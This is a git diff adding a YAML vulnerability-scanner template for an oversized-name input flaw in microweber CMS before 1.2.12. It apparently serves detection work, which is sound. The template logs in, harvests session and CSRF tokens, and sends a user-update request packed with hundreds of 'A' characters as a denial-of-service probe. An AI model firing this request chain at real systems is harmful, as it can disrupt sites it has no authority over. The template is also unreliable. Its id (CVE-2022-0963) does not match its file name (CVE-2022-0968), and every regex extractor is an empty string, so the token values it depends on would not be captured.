diff --git a/cves/2022/CVE-2022-0968.yaml b/cves/2022/CVE-2022-0968.yaml new file mode 100644 index 0000000000..a813148f51 --- /dev/null +++ b/cves/2022/CVE-2022-0968.yaml @@ -0,0 +1,99 @@ +id: CVE-2022-0963 + +info: + name: Integer Overflow in microweber prior to 1.2.12 + author: amit-jd + severity: high + description: The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters. + reference: + - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0968 + - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-190 + tags: overflow, microweber, CMS + +requests: + - raw: + - |- + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /csrf/ HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + + - |+ + GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}} + + - |- + POST /api/user/2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-XSRF-TOKEN: {{url_decode(csrf_token)}} + Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}} + + thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user_name}}&verify_password=&first_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&last_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key= + + req-condition: true + cookie-reuse: true + extractors: + - type: kval + part: header + name: csrf_token + kval: + - XSRF-TOKEN + internal: true + + - type: kval + part: header + name: session + kval: + - laravel_session + internal: true + + - type: regex + part: body + name: form_token + internal: true + group: 1 + regex: + - '' + + - type: regex + part: body + name: user_name + internal: true + group: 1 + regex: + - '' + + - type: regex + part: body + name: email + internal: true + group: 1 + regex: + - '' + + - type: dsl + part: body + name: response + dsl: + - body_4 + + matchers: + - type: dsl + dsl: + - 'contains(body_4,"first_name":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")' + - 'status_code_4==200' + condition: and \ No newline at end of file